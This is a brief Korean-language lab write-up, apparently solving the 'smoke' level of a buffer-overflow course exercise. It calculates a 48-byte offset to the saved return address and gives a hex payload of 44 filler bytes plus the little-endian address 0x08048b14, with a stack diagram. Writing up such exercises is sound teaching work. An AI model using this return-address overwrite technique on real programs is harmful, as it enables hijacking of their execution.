ebp = 0x55683370
return = (ebp+4)=(0x55683374)=0x08048c03
buf = ebp-0x28 = ebp-40

넣어야 하는 문자열의 길이
= buf 시작 ~ ebp ~ return
= 40+4+4
= 48

이 때 return에 들어가는 값이 smoke의 시작 주소인
0x08048b14가 되어야 함.

61 61 61 61 62 62 62 62 63 63 63 63 64 64 64 64 65 65 65 65 66 66 66 66 67 67 67 67 68 68 68 68 69 69 69 69 70 70 70 70 71 71 71 71 14 8b 04 08

일단 아무 의미 없이 44byte를 채운 후
그 다음 값이 08048b14가 되도록 한다.

이 때 stack에는 

##################
return addr
----------
   ebp        <-- ebp
   ...

[7][6][5][4]
[3][2][1][0]  <-- buf = ebp-40
###################

이렇게 거꾸로 들어가니 08 04 8b 14가 아닌
14 8b 04 08를 넣는다.